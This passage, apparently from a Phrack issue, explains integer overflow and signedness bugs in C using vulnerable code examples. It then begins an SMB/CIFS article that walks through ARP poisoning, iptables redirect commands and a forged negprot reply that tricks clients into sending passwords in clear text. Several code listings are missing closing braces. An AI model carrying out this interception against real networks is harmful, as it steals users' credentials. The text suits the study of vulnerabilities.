    Segmentation fault (core dumped)

The length argument is taken from the command line and held in the integer
i.  When this value is transferred into the short integer s, it is
truncated if the value is too great to fit into s (i.e. if the value is
greater than 65535).  Because of this, it is possible to bypass the bounds
check at [w1] and overflow the buffer.  After this, standard stack smashing
techniques can be used to exploit the process.

----[ 2.2 Arithmetic overflows

As shown in section 2.0, if an attempt is made to store a value in an
integer which is greater than the maximum value the integer can hold, the
value will be truncated.  If the stored value is the result of an
arithmetic operation, any part of the program which later uses the result
will run incorrectly as the result of the arithmetic being incorrect.
Consider this example demonstrating the wrap around shown earlier:

    /* ex2.c - an integer overflow */
    #include <stdio.h>

    int main(void){
            unsigned int num = 0xffffffff;

            printf("num is %d bits long\n", sizeof(num) * 8);
            printf("num = 0x%x\n", num);
            printf("num + 1 = 0x%x\n", num + 1);

            return 0;
    /* EOF */

The output of this program looks like this:

    nova:signed {4} ./ex2
    num is 32 bits long
    num = 0xffffffff
    num + 1 = 0x0

The astute reader will have noticed that 0xffffffff is decimal -1, so it
appears that we're just doing
1 + (-1) = 0
Whilst this is one way at looking at what's going on, it may cause some
confusion since the variable num is unsigned and therefore all arithmetic
done on it will be unsigned.  As it happens, a lot of signed arithmetic
depends on integer overflows, as the following demonstrates (assume both
operands are 32 bit variables):

-700       + 800   = 100
0xfffffd44 + 0x320 = 0x100000064

Since the result of the addition exceeds the range of the variable, the
lowest 32 bits are used as the result.  These low 32 bits are 0x64, which
is equal to decimal 100.

Since an integer is signed by default, an integer overflow can cause a
change in signedness which can often have interesting effects on subsequent
code.  Consider the following example:

    /* ex3.c - change of signedness */
    #include <stdio.h>

    int main(void){
            int l;

            l = 0x7fffffff;

            printf("l = %d (0x%x)\n", l, l);
            printf("l + 1 = %d (0x%x)\n", l + 1 , l + 1);

            return 0;
    /* EOF */

The output of which is:

    nova:signed {38} ./ex3
    l = 2147483647 (0x7fffffff)
    l + 1 = -2147483648 (0x80000000)

Here the integer is initialised with the highest positive value a signed
long integer can hold.  When it is incremented, the most significant bit
(indicating signedness) is set and the integer is interpreted as being

Addition is not the only arithmetic operation which can cause an integer to
overflow.  Almost any operation which changes the value of a variable can
cause an overflow, as demonstrated in the following example:

    /* ex4.c - various arithmetic overflows */
    #include <stdio.h>

    int main(void){
            int l, x;

            l = 0x40000000;

            printf("l = %d (0x%x)\n", l, l);

            x = l + 0xc0000000;
            printf("l + 0xc0000000 = %d (0x%x)\n", x, x);

            x = l * 0x4;
            printf("l * 0x4 = %d (0x%x)\n", x, x);

            x = l - 0xffffffff;
            printf("l - 0xffffffff = %d (0x%x)\n", x, x);

            return 0;
    /* EOF */


    nova:signed {55} ./ex4
    l = 1073741824 (0x40000000)
    l + 0xc0000000 = 0 (0x0)
    l * 0x4 = 0 (0x0)
    l - 0xffffffff = 1073741825 (0x40000001)

The addition is causing an overflow in exactly the same way as the first
example, and so is the multiplication, although it may seem different.  In
both cases the result of the arithmetic is too great to fit in an integer,
so it is reduced as described above.  The subtraction is slightly
different, as it is causing an underflow rather than an overflow: an
attempt is made to store a value lower than the minimum value the integer
can hold, causing a wrap around.  In this way we are able to force an
addition to subtract, a multiplication to divide or a subtraction to add.

------[ 2.2.1 Exploiting

One of the most common ways arithmetic overflows can be exploited is when a
calculation is made about how large a buffer must be allocated.  Often a
program must allocate space for an array of objects, so it uses the
malloc(3) or calloc(3) routines to reserve the space and calculates how
much space is needed by multiplying the number of elements by the size of
an object.  As has been previously shown, if we are able to control either
of these operands (number of elements or object size) we may be able to
mis-size the buffer, as the following code fragment shows:

    int myfunction(int *array, int len){
        int *myarray, i;

        myarray = malloc(len * sizeof(int));    /* [1] */
        if(myarray == NULL){
            return -1;

        for(i = 0; i < len; i++){              /* [2] */
            myarray[i] = array[i];

        return myarray;

This seemingly innocent function could bring about the downfall of a system
due to its lack of checking of the len parameter.  The multiplication at
[1] can be made to overflow by supplying a high enough value for len, so we
can force the buffer to be any length we choose.  By choosing a suitable
value for len, we can cause the loop at [2] to write past the end of the
myarray buffer, resulting in a heap overflow.  This could be leveraged into
executing arbitrary code on certain implementations by overwriting malloc
control structures, but that is beyond the scope of this article.

Another example:

    int catvars(char *buf1, char *buf2, unsigned int len1,
                unsigned int len2){
        char mybuf[256];

        if((len1 + len2) > 256){    /* [3] */
            return -1;

        memcpy(mybuf, buf1, len1);      /* [4] */
        memcpy(mybuf + len1, buf2, len2);


        return 0;

In this example, the check at [3] can be bypassed by using suitable values
for len1 and len2 that will cause the addition to overflow and wrap around
to a low number.  For example, the following values:

    len1 = 0x104
    len2 = 0xfffffffc

when added together would result in a wrap around with a result of 0x100
(decimal 256).  This would pass the check at [3], then the memcpy(3)'s at
[4] would copy data well past the end of the buffer.

--[ 3 Signedness Bugs

Signedness bugs occur when an unsigned variable is interpreted as signed,
or when a signed variable is interpreted as unsigned.  This type of
behaviour can happen because internally to the computer, there is no
distinction between the way signed and unsigned variables are stored.
Recently, several signedness bugs showed up in the FreeBSD and OpenBSD
kernels, so there are many examples readily available.

----[ 3.1 What do they look like?

Signedness bugs can take a variety of forms, but some of the things to look
out for are:
* signed integers being used in comparisons
* signed integers being used in arithmetic
* unsigned integers being compared to signed integers

Here is classic example of a signedness bug:

    int copy_something(char *buf, int len){
        char kbuf[800];

        if(len > sizeof(kbuf)){         /* [1] */
            return -1;

        return memcpy(kbuf, buf, len);  /* [2] */

The problem here is that memcpy takes an unsigned int as the len parameter,
but the bounds check performed before the memcpy is done using signed
integers.  By passing a negative value for len, it is possible to pass the
check at [1], but then in the call to memcpy at [2], len will be interpeted
as a huge unsigned value, causing memory to be overwritten well past the
end of the buffer kbuf.

Another problem that can stem from signed/unsigned confusion occurs when
arithmetic is performed.  Consider the following example:

    int table[800];

    int insert_in_table(int val, int pos){
        if(pos > sizeof(table) / sizeof(int)){
            return -1;

        table[pos] = val;

        return 0;

Since the line
    table[pos] = val;
is equivalent to
    *(table + (pos * sizeof(int))) = val;
we can see that the problem here is that the code does not expect a
negative operand for the addition: it expects (table + pos) to be greater
than table, so providing a negative value for pos causes a situation which
the program does not expect and can therefore not deal with.

------[ 3.1.1 Exploiting

This class of bug can be problematic to exploit, due to the fact that
signed integers, when interpreted as unsigned, tend to be huge.  For
example, -1 when represented in hexadecimal is 0xffffffff.  When
interpreted as unsiged, this becomes the greatest value it is possible to
represent in an integer (4,294,967,295), so if this value is passed to
mempcpy as the len parameter (for example), memcpy will attempt to copy 4GB
of data to the destination buffer.  Obviously this is likely to cause a
segfault or, if not, to trash a large amount of the stack or heap.
Sometimes it is possible to get around this problem by passing a very low
value for the source address and hope, but this is not always possible.

----[ 3.2 Signedness bugs caused by integer overflows

Sometimes, it is possible to overflow an integer so that it wraps around to
a negative number.  Since the application is unlikely to expect such a
value, it may be possible to trigger a signedness bug as described above.

An example of this type of bug could look like this:

    int get_two_vars(int sock, char *out, int len){
        char buf1[512], buf2[512];
        unsigned int size1, size2;
        int size;

        if(recv(sock, buf1, sizeof(buf1), 0) < 0){
            return -1;
        if(recv(sock, buf2, sizeof(buf2), 0) < 0){
            return -1;

        /* packet begins with length information */
        memcpy(&size1, buf1, sizeof(int));
        memcpy(&size2, buf2, sizeof(int));

        size = size1 + size2;       /* [1] */

        if(size > len){             /* [2] */
            return -1;

        memcpy(out, buf1, size1);
        memcpy(out + size1, buf2, size2);

        return size;

This example shows what can sometimes happen in network daemons, especially
when length information is passed as part of the packet (in other words, it
is supplied by an untrusted user).  The addition at [1], used to check that
the data does not exceed the bounds of the output buffer, can be abused by
setting size1 and size2 to values that will cause the size variable to wrap
around to a negative value.  Example values could be:
    size1 = 0x7fffffff
    size2 = 0x7fffffff
    (0x7fffffff + 0x7fffffff = 0xfffffffe (-2)).
When this happens, the bounds check at [2] passes, and a lot more of the
out buffer can be written to than was intended (in fact, arbitrary memory
can be written to, as the (out + size1) dest parameter in the second memcpy
call allows us to get to any location in memory).

These bugs can be exploited in exactly the same way as regular signedness
bugs and have the same problems associated with them - i.e. negative values
translate to huge positive values, which can easily cause segfaults.

--[ 4 Real world examples

There are many real world applications containing integer overflows and
signedness bugs, particularly network daemons and, frequently, in operating
system kernels.

----[ 4.1 Integer overflows

This (non-exploitable) example was taken from a security module for linux.
This code runs in the kernel context:

    int rsbac_acl_sys_group(enum  rsbac_acl_group_syscall_type_t call,
                            union rsbac_acl_group_syscall_arg_t arg)
            case ACLGS_get_group_members:
              if(   (arg.get_group_members.maxnum <= 0) /* [A] */
                 || !
                rsbac_uid_t * user_array;
                rsbac_time_t * ttl_array;

                user_array = vmalloc(sizeof(*user_array) *
                arg.get_group_members.maxnum);   /* [B] */
                  return -RSBAC_ENOMEM;
                ttl_array = vmalloc(sizeof(*ttl_array) *
                arg.get_group_members.maxnum); /* [C] */
                    return -RSBAC_ENOMEM;

                err =


In this example, the bounds checking at [A] is not sufficient to prevent
the integer overflows at [B] and [C].  By passing a high enough (i.e.
greater than 0xffffffff / 4) value for   arg.get_group_members.maxnum, we
can cause the multiplications at [B] and [C] to overflow and force the
buffers ttl_array and user_array to be smaller than the application
expects.  Since rsbac_acl_get_group_members copies user controlled data
to these buffers, it is possible to write past the end of the user_array
and ttl_array buffers. In this case, the application used vmalloc() to
allocate the buffers, so an attempt to write past the end of the buffers
will simply raise an error, so it cannot be exploited.  Even so, it
provides an example of what these bugs can look like in real code.

Another example of a recent real world integer overflow vulnerability
was the problem in the XDR RPC library (discovered by ISS X-Force). In this
case, user supplied data was used in the calculation of the size of a
dynamically allocated buffer which was filled with user supplied data.  The
vulnerable code was this:

    xdr_array (xdrs, addrp, sizep, maxsize, elsize, elproc)
         XDR *xdrs;
         caddr_t *addrp;	/* array pointer */
         u_int *sizep;		/* number of elements */
         u_int maxsize;		/* max numberof elements */
         u_int elsize;		/* size in bytes of each element */
         xdrproc_t elproc;	/* xdr routine to handle each element */
      u_int i;
      caddr_t target = *addrp;
      u_int c;		/* the actual element count */
      bool_t stat = TRUE;
      u_int nodesize;


      c = *sizep;
      if ((c > maxsize) && (xdrs->x_op != XDR_FREE))
          return FALSE;
      nodesize = c * elsize;    /* [1] */


      *addrp = target = mem_alloc (nodesize);   /* [2] */


      for (i = 0; (i < c) && stat; i++)
          stat = (*elproc) (xdrs, target, LASTUNSIGNED);   /* [3] */
          target += elsize;

As you can see, by supplying large values for elsize and c (sizep), it
was possible to cause the multiplication at [1] to overflow and cause
nodesize to be much smaller than the application expected.  Since
nodesize was then used to allocate a buffer at [2], the buffer could be
mis-sized leading to a heap overflow at [3].  For more information on this
hole, see the CERT advisory listed in the appendix.

----[ 4.2 Signedness bugs

Recently, several signedness bugs were brought to light in the freebsd
kernel.  These allowed large portions of kernel memory to be read by
negative length paramters to various syscalls.  The getpeername(2) function
had such a problem and looked like this:

    static int
    getpeername1(p, uap, compat)
        struct proc *p;
        register struct getpeername_args /* {
            int	fdes;
            caddr_t asa;
            int	*alen;
    } */ *uap;
    int compat;
        struct file *fp;
        register struct socket *so;
        struct sockaddr *sa;
        int len, error;


        error = copyin((caddr_t)uap->alen, (caddr_t)&len, sizeof (len));
        if (error) {
            fdrop(fp, p);
            return (error);


        len = MIN(len, sa->sa_len);    /* [1] */
        error = copyout(sa, (caddr_t)uap->asa, (u_int)len);
        if (error)
            goto bad;
        error = copyout((caddr_t)&len, (caddr_t)uap->alen, sizeof (len));
        if (sa)
            FREE(sa, M_SONAME);
        fdrop(fp, p);
        return (error);

This is a classic example of a signedness bug - the check at [1] did not
take into account the fact that len could be negative, in which case the
MIN macro would always return len.  When this negative len parameter was
passed to copyout, it was interpretted as a huge positive integer which
caused copyout to copy up to 4GB of kernel memory to user space.

--[ Conclusion

Integer overflows can be extremely dangerous, partly because it is
impossible to detect them after they have happened.  If an integer overflow
takes place, the application cannot know that the calculation it has
performed is incorrect, and it will continue under the assumption that it
is.  Even though they can be difficult to exploit, and frequently cannot be
exploited at all, they can cause unepected behaviour, which is never a good
thing in a secure system.

--[ Appendix

CERT advisory on the XDR bug:
FreeBSD advisory:

|=[ EOF ]=---------------------------------------------------------------=|


               Volume 0x0b, Issue 0x3c, Phile #0x0b of 0x10

|=---------------------=[ SMB/CIFS BY THE ROOT ]=------------------------=|
|=---------------=[ ledin <[email protected]> ]=-----------------=|

--[ Contents

 1 - Introduction
 2 - What is SMB/CIFS
 3 - Session establishment
     How does a client establish a SMB session with a server ? 
 4 - Security level of SMB
 5 - Passwords
 6 - Description of several SMB packets
   6.1 - The general aspect of a SMB packet
   6.2 - NETBIOS and SMB
   6.3 - The SMB base header
   6.4 - Description of the most importants SMB commands
   6.5 - How I can recover SMB passwords in clear from the network when 
        they should be encrypted ?
   6.6 - Man in the middle attack
   6.7 - Notes about windows 2k/XP SMB operating over TCP 
 7 - Transaction subprotocol and RAP commands 
   7.1 - RAP commands
 8 - Using RAP commands to list shares available on  a server
   8.1 - TconX packets
   8.2 - Explanation of the RAP command "NetshareEnum"
 9 - Conclusion
 10 - References
 11 - Thanks 

 Appendix A

 Appendix B
--[ 1 - Introduction

   In this article, I will try to explain what CIFS and SMB are , how
it works and some common insecurities present on these protocols.
This article constitue  a useful source of knowledge about Microsoft 
networking. The SMB protocol is one of the most used protocols on LAN.
I have also included source code in the aim of giving a good expamle 
of SMB operating.

   You will learn how to use ARP poisoning to have password in clear 
from the network when all SMB passwords are encrypted (without brute 
forcing). You will be able to understand the link between SMB and 
NETBIOS. You will also learn what is and how works the Microsoft 
Remote Administration Protocol (RAP) for scanning remote shares on a
SMB server.

   Programs and information are given for educational purpose only. 
I could be not responsable of what you will make with.

--[ 2 - What is SMB/CIFS ?

According to Microsoft CIFS is intended to provide an open cross-
platform mechanism for client systems to request file and print 
services from server systems over a network. It is based on the
standard Server Message Block (SMB) protocol widely in use by 
personal computers and workstations running a wide variety of 
operating systems.

In fact, SMB (for Server Message Block) is a protocol which operates
the data transfert between sharing files, devices, named pipes 
or mail slot across a network. CIFS is a public version of SMB.

SMB clients available :

 from Microsoft : Windows 95, Windows for workgroups 3.x, 
 Windows NT,2000 and XP

 for Linux :
 Smblient from Samba
 Smbfs for Linux

SMB servers :
 Microsoft Windows for Workgroups 3.x
 Microsoft Windows 95
 Microsoft Windows NT 
 The PATHWORKS family of servers from Digital
 LAN Manager for OS/2,SCO,etc
 VisionFS from SCO
 TotalNET Advanced Server from Syntax
 Advanced Serverfor UNIX from AT&T (NCR?)
 LAN Server for OS/2 from IBM.

--[ 3 - Session establishment

   Note : SMB protocol was developed to run on DOS ( powered by an 
Intel chip) so byte ordering is little-endian the opposite of network

   SMB can run over TCP/IP, NetBEUI, DECnet Protocol and IPX/SPX. 
With a SMB implementation over TCP/IP, DECnet or NETBEUI, the 
NETBIOS names must be use.

   I will explain in the sixth chapter what NETBIOS is. But for the 
moment, you just have to know that a NETBIOS name identifies one computer
on a Microsoft network.

   The development of SMB has begun in the eighties, so there is a lot
of versions of the SMB protocol. But the most used (on Windows 95, 
98, Windows NT, Windows 2000 and XP) is the NT LM 0.12 
version. This article is based on the NT LM 0.12 version.

   You have to know that a SMB Domain name identifies a group of 
ressource (users, printers, files ..) on a SMB server.

How does a client establish a SMB session with a server ?

   Let's take this situation : a client  wants to access to a specific
ressource on a server.

1 - To begin the client requests the server for a NETBIOS session. 
The client sends his encoded NETBIOS name to the SMB server 
(which listening connection requests on port 139). 
The server receives the NETBIOS name and replies with a NETBIOS 
session packet to valid the session. The client enters after in a 
SMB session establishment i.e the identification of the client 
to the SMB server.

2 - The client sends a SMB negprot request packet (negprot for 
"negotiate protocol"). The client gives a list of SMB protocol 
versions supported.
Then the server sends a SMB negprot reply packet (with informations 
like SMB domain name, maximun connections accepted, 
SMB protocol versions supported ...)

3 - After the negotiation of protocols, the client processes to a user
or share identification on the server.(see the next chapter to know 
 what is the difference between a share and a user identification)

This process is operated by the SesssetupX request packet (SesssetupX 
for Session Setup and X).
The client sends a couple login/password or a simple password to the 
server that refuses or allows the conection with a SessetupX reply 

4 - Ok, when the client has finished with negotiation and identification
it sends a tconX packet for specifying the network name of the ressource
that it wants to access, and the server sends a Tconx reply indicating 
if the connection is accepted or not.

                                 netbios session request 
                                      (netbios name)
              [client]       --------------------------->   [server]
                                 netbios session granted
	      [client]       <--------------------------    [server]

                                  SMB negprot request
              [client]       --------------------------->   [server]
                                  SMB negprot reply
              [client]       <--------------------------    [server]

                                SMB sesssetupX request
              [client]       --------------------------->   [server]
                                 SMB sesssetupX reply
              [client]       <--------------------------    [server]

                                 SMB TconX request
              [client]       --------------------------->   [server]
                                 SMB TconX reply
              [client]       <--------------------------    [server]
A complete description of each packets is given in the chapter six.

--[ 4 - Security level of SMB 

There is two types of security models on SMB :

   The first is  the "Share level" security model. This security model
associates a password to a shared ressource on the network. The user 
logs to this ressource (IPC, Disk, Printers) with the correct password.
The user is anyone on the network who knows the name of the server where 
the ressource is.

   The second is the "User Level". This security model is an enhanced
implementation of the first. It consists to associate a couple of 
login/password to a shared ressource. So if a person wants to 
connect to this shared ressource, he has to know the login/password 
couple. This security level is useful to know who makes what.

--[ 5 - Passwords

   With SMB, when you have to make an identification on a server, your
password could be sent in clear or encrypted. If the server supports
encryption, the client will have to answer a challenge. The server
knows the password, so in the negprot reply packet, an encryption key
will be send to the client. The client encrypts the password,
and sends it in the SesssetupX request packet, the server verifies the
validity of the password and allows the session or not.

You have to know that a SMB password (not encrypted) is 14 bytes 
long maximum. The size of the encryption key is usually 8 bytes long.
The size of the encrypted password is 24 bytes. With ANSI password, the
characters of the password are converted in upper case for the 

The password is encrypted with a DES encryption in block mode.

--[6 - Description of several SMB packets

   In this part I will give the description of the most important 
packets types involved in SMB protocol. I know it's a bit boring 
but this is the base to understand how works SMB and the attacks.
I will explain what is very important in each type of packet.
For each type of command correspond two types of packets. The request 
packet and the reply packet.

----[ 6.1 - The general aspect of a SMB packet.

   In the majority of case SMB runs over TCP/IP protocol suite. 
So let's consider that SMB runs over TCP layer for us. Over the TCP 
layer, you will always find the NETBIOS (NBT) header. Over NBT you 
have the SMB base header. Over the SMB base header, you have an 
another type of header, which depends of the specific command you 

                    |      TCP header    |
                    |   NETBIOS header   |
                    |   SMB base header  |
                    | SMB Command header |
                    |        DATA        |
The "SMB Base header" contains several informations, like the size of 
reception buffers, maximum connexions allowed... It also contains a 
number that identifies the command requested. 

"SMB command header" is a header with all the parameters for the 
requested command (a command like negotiate protocol versions ... )

"DATA" is the data for the requested command.

I call "SMB packet", the NETBIOS Header + the SMB base header +
the SMB Command header + DATA.

NOTE :  I will use this definitions :

typedef unsigned char UCHAR;          // 8 unsigned bits
typedef unsigned short USHORT;        // 16 unsigned bits
typedef unsigned long ULONG;          // 32 unsigned bits

and STRING defined a null terminated ASCII string. 

----[ 6.2 - NETBIOS and SMB

NETBIOS (for NETwork Basic Input and Outpout System) is widely use 
on Microsoft networks. It is a sofware interface and a naming system.
Each computer has a NETBIOS name, which is 15 characters long, and a 
sixteenth character is used to identify the type of computer 
( Domain Name server, workstation...).

Value for the sixteenth character :

0x00 base computer, workstation.
0x20 resource sharing server.

There are other values but these are the most interessant for us. The 
first (0x00) identify a workstation and the second (0x20) the server. 

On a SMB packet, the NETBIOS header corresponds to the NETBIOS 
Session header, defined like this :
                UCHAR Type;   	// Type of the packet
                UCHAR Flags;  	// Flags
                USHORT Length;	// Count of data bytes (netbios header
                                                        not included)
For the "Flags" field, the value is always 0. (with SMB, not in general !)

For the "Type" field, several values are possible :

               0x81 corresponds to a NETBIOS session request. This code
is used when the client sends its NETBIOS name to the server.

               0x82 is a positive response to a NETBIOS session request.
This code is used by the server to authorize a NETBIOS session. 

               0x00 correspond to a session message. This code is always 
used in a SMB session i.e when the client has sent his NETBIOS name to 
the server and has received a positive reply.	       
The "Length" field contains a count of data bytes (The netbios header 
is not included), "data" means what is above the NETBIOS header (it 
could be the SMB Base header + SMB Command header + DATA or NETBIOS 

NETBIOS names and encoding

A NETBIOS encoded name is 32 bytes long.

A NETBIOS name is always given in upper case characters.

It's very easy to encode a NETBIOS name. For example the NETBIOS name 
of my computer is "BILL" and it's a workstation so there is a "0x00"
for the sixteenth character.

Firstly, when a NETBIOS name is shorter than 15 bytes, it may be padded
on the right with spaces.

     "BILL           "      

In hexadecimal  0x42 0x49 0x4c 0x4c 0x20 0x20 ......0x00

Each bytes are splited into 4-bit halves.

0x4 0x2 0x4 0x9 0x4 0xc 0x4 0xc 0x2 0x0 .......

And each 4-bit half is added to the ASCII value of the 'A' letter (0x41)

0x4 + 0x41 = 0x45  -> ASCII value = E

0x2 + 0x41 = 0x43  -> ASCII value = C

And you have the encoded NETBIOS name which is 32 bytes long.

Note :

 SMB can run directly over TCP without NBT (it's supported on Win2k 
and XP on port 445). The NETBIOS name are not limited to 15 characters. 

You don't need to know more, if you want to have more information 
about NETBIOS read [3] and [4].

----[ 6.3 - The SMB base header    

This header is used in all SMB packets, this is its definition :

    UCHAR Protocol[4];                // Contains 0xFF,'SMB'
    UCHAR Command;                    // Command code
    union {
        struct {
            UCHAR ErrorClass;         // Error class
            UCHAR Reserved;           // Reserved for future use
            USHORT Error;             // Error code
        } DosError;
        ULONG Status;                 // 32-bit error code
    } Status;
    UCHAR Flags;                      // Flags
    USHORT Flags2;                    // More flags
    union {
        USHORT Pad[6];                // Ensure section is 12 bytes long
        struct {
            USHORT PidHigh;           // High part of PID
            ULONG  Unused;            // Not used
            ULONG  Unused2;
    } Extra;
    USHORT Tid;                       // Tree identifier
    USHORT Pid;                       // Caller's process id
    USHORT Uid;                       // Unauthenticated user id
    USHORT Mid;                       // multiplex id
    UCHAR  WordCount;                 // Count of parameter words
    USHORT ParameterWords[ WordCount ];    // The parameter words
    USHORT ByteCount;                 // Count of bytes
    UCHAR  Buffer[ ByteCount ];       // The bytes

The "Protocol" field contains the name of the protocol (SMB) with a 
0xFF before.

The "Command" field contains the value of the requested command. For 
example 0x72 is for the "negotiate protocol" command.
The "Tid" field is used when the client is successfully connected to a
ressource on a SMB server . The TID number identifies this ressource.

The "Pid" field is used when the client has successfully created a 
process on the server. The PID number identifies this process.

The "Uid" field is used when a user is successfully authenticated 
on a server. The UID number identify this user.

The "Mid" field is used in couple with the PID when a client has 
several requests on the server ( process, threads, file acess...).

The "Flags2" field is also important, when the bit 15 is armed, the 
strings are UNICODE strings .  

----[ 6.4 - Description of the most importants SMB commands

 SMB negotiate Protocol (negprot)
   The Negotiate Protocol Command is used in the first step of the SMB 
session establishment.

The Command code for the field "Command" in the SMB Base header is : 0x72.

Here is the description of the negprot request and reply headers : 

  Request header
 UCHAR WordCount;              Count of parameter words = 0
 USHORT ByteCount;             Count of data bytes
 struct {
   UCHAR BufferFormat;        0x02 -- Dialect
   UCHAR DialectName[];       ASCII null-terminated string
 } Dialects[];

   This packet is sent by the client to give the server its list of 
SMB protocol versions supported.

   Just three things to say, for this packets, "WordCount" field is 
always set to zero, "ByteCount" field is equal to the size of the 
"Dialects" structure, the field "BufferFormat of "Dialects" is always
equal to 0x02.

   The "DialectName" string contains the name of the several SMB 
protocol versions supported by the client.    
  Reply header
 UCHAR WordCount;           Count of parameter words = 17
 USHORT DialectIndex;       Index of selected dialect
 UCHAR SecurityMode;        Security mode:
                            bit 0: 0 = share, 1 = user
                            bit 1: 1 = encrypt passwords
 USHORT MaxMpxCount;        Max pending multiplexed requests
 USHORT MaxNumberVcs;       Max VCs between client and server
 ULONG MaxBufferSize;       Max transmit buffer size
 ULONG MaxRawSize;          Maximum raw buffer size
 ULONG SessionKey;          Unique token identifying this session
 ULONG Capabilities;        Server capabilities
 ULONG SystemTimeLow;       System (UTC) time of the server (low).
 ULONG SystemTimeHigh;      System (UTC) time of the server (high).
 USHORT ServerTimeZone;     Time zone of server (min from UTC)
 UCHAR EncryptionKeyLength; Length of encryption key.
 USHORT ByteCount;          Count of data bytes
 UCHAR EncryptionKey[];     The challenge encryption key
 UCHAR OemDomainName[];     The name of the domain (in OEM chars)

This packet is sent by the server to give the client the list 
of SMB protocol versions supported, the SMB domain name of the server 
and an encryption key if necessary. 
The first interessant field is the "SecurityMode" byte. If the bit 0 
is armed we have a user security level. If it's not, we have a 
share security level. If the bit 1 is armed the password is encrypted
with a DES encryption in block mode.

The "SessionKey" field is used to identify the session . There is one 
single session key for one session.
The "Capabilities" field indicates if the server supported UNICODE 
strings or NT LM 0.12 particular commands ...
The datas are at the end of the header. With a negprot reply, 
these datas corespond to the strings "EncryptionKey" and 

The length of these two strings together is given by the "Bytecount" 
The length of the "EncrytionKey" string is given by the field 
"EncryptionKeyLength". The "EncryptionKey" string contains the Key for
the encryption of the password.

The length of "OemDomainName" is given by 
     (Bytecount - EncryptionKeyLength). 
The "OemDomainName" string contains the SMB domain name of the server
(in OEM chars).

 Session setup and X
   The Session Setup and X packets (SesssetupX or setupx for 
abbrevation) are used to deal with the identity of a user or when you
have to give a password to acess a ressource. 

   The Command code for the Session Setup and X command is 0x73.

  Request header
 UCHAR WordCount;               Count of parameter words = 13
 UCHAR AndXCommand;             Secondary (X) command;  0xFF = none
 UCHAR AndXReserved;            Reserved (must be 0)
 USHORT AndXOffset;             Offset to next command WordCount
 USHORT MaxBufferSize;          Client's maximum buffer size
 USHORT MaxMpxCount;            Actual maximum multiplexed pending
 USHORT VcNumber;               0 = first (only), nonzero=additional
                                VC number
 ULONG SessionKey;              Session key (valid iff VcNumber != 0)
 USHORT                         Account password size, ANSI
 USHORT                         Account password size, Unicode
 ULONG Reserved;                must be 0
 ULONG Capabilities;            Client capabilities
 USHORT ByteCount;              Count of data bytes;    min = 0
 UCHAR                          Account Password, ANSI
 UCHAR CaseSensitivePassword[]; Account Password, Unicode
 STRING AccountName[];          Account Name, Unicode
 STRING PrimaryDomain[];        Client's primary domain, Unicode
 STRING NativeOS[];             Client's native operating system,
 STRING NativeLanMan[];         Client's native LAN Manager type,

This packet gives a lot of information about the client's system.

The field "MaxBufferSize" is very important, it gives the maximun 
size of data that the client can receive. If you set it to zero 
you will not receive any type of data from the server.
For the data, you have several strings. The most important are 
"CaseSensitivePassword" (password in UNICODE characters)
and "CaseInsensitivePassword" (password in ANSI characters).

One of both is used, it depends if the server is supporting UNICODE
strings or not (see negatiate protocol reply packet description). 
The length of the password is given in the fields 
"CaseInsensitivePasswordLength" or in
"CaseSensitivePasswordLength" .

For the other strings, see the description. The count of data bytes
is given by the "Bytecount" field.

  Reply header
 UCHAR WordCount;                   Count of parameter words = 3
 UCHAR AndXCommand;                 Secondary (X) command;  0xFF =
 UCHAR AndXReserved;                Reserved (must be 0)
 USHORT AndXOffset;                 Offset to next command WordCount
 USHORT Action;                     Request mode:
                                    bit0 = logged in as GUEST
 USHORT ByteCount;                  Count of data bytes
 STRING NativeOS[];                 Server's native operating system
 STRING NativeLanMan[];             Server's native LAN Manager type
 STRING PrimaryDomain[];            Server's primary domain

Again, there are a lot of information on this packet : OS Type,
version of the SMB server software running on server and DomainName.

If the connection failed, there is nothing for NativeOS, NativeLanman
and PrimaryDomain strings.

OK I have finished with the "hard" part, we can play a little with 
the SMB protocol.

If you want to learn more about it, read [1].

----[ 6.5 - How I can recover SMB passwords in clear from the network 
            when they should be encrypted 

   During the session establishment, the password is sent to the server
during the SMB setupx Session. The SMB negprot reply packet contains 
a bit in the "SecurityMode" field which allows password encryption 
or not.

   So if you want to have a password in clear when all is encrypted, you
have two possibilities.

   The first one is to catch the encryption key and the encrypted 
password and brute force it ! It can be very long ...

	Some programs like LophtCrack (with SMBGrinder), dsniff or readsmb2 
sniff SMB encrypted passwords.

   The second way is to hijack the connection and to make the client 
believe that the password should not be encrypted.

   This technic is a bit complex to explain, but I will say how to 
do it !

   If the server is configured to encrypt password, the SMB negprot 
reply packet has the bit 1 of the "SecurityMode" field armed. But if 
an attacker sends a negprot reply packet with this bit equal to 
zero before the server, the password will be in clear in the 
SessetupX request packet .

                   negprot request 
  [client]     ------------------------>         [server]

                [attacker waits for a negprot request]

  [client]   <-------------|                     [server]
                           | fake negprot reply
                [attacker sends his fake neprot reply]

                  real negprot reply
  [client]   <----------------------------------  [server]

                [attacker (does nothing)]

               sessetupX request with the password in clear text
  [client]    ----------------------------------> [server]

                [attacker sniffs the password in clear text]

These diagrams illustrate a direct packet injection on the network.
In majority of case, this method doesn't work because the fake
negprot reply could treated after the real. There is also other 
problems, session failures, validity of password, does not work
in a switched environment...
We can avoid all of these problems by using Arp-Poisoning.

I will not explain and describe what is ARP-Poisoning, you could find a 
lot of docs about it on internet . But, if you don't know what it is, 
you just have to know that this attack allow the attacker to redirect 
and modify the traffic between the server and the client.

If you consider this situation, the attacker is between the both.

He is the man in the middle ...

----[ 6.6 - Man in the middle attack

          "Attack where your enemy is not expecting you"
                                 Sun Tzu, "The art of war"

Now I will describe the man in the middle attack. This attack allow 
you to bypass switches, to avoid connection failures and to grab the 
password in clear.

Let's consider that the traffic between the client and the server 
is redirected by the attacker ( thanks to ARP poisoning !).
The client requests a SMB session to the server. 
The client will send packets to the SMB port (139) of the server. The 
attacker receives them. But the attacker doesn't redirect the packet to
the server. 
The whole incoming traffic to the server's SMB port (so to the attacker's 
machine) is redirected on the local port 1139 of the attacker (very easy 
to do with NAT and iptables).
The whole traffic (not only SMB) is redirected also with iptables and 
On the port 1139, there is a program (a transparent proxy program) that 
assumes the modification and redirection of the SMB packets.

The two iptables/NAT commands are :

To redirect the incoming traffic (on port 139 ) to a local port (1139 for

#iptables -t nat -A PREROUTING -i eth0 -p tcp -s \
--dport 139 -j REDIRECT --to-port 1139 is the IP address of the client 

To redirect the whole traffic

#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

What are the modifications ? :

The attacker modifies the negprot reply to have password in
clear text. The attacker recovers also the encryption key.
The attacker set to zero the value of the length of the encryption 
key and put the domain name instead of the encryption key. 
He sets the encryption bit of the "SecurityMode" field to 0. 
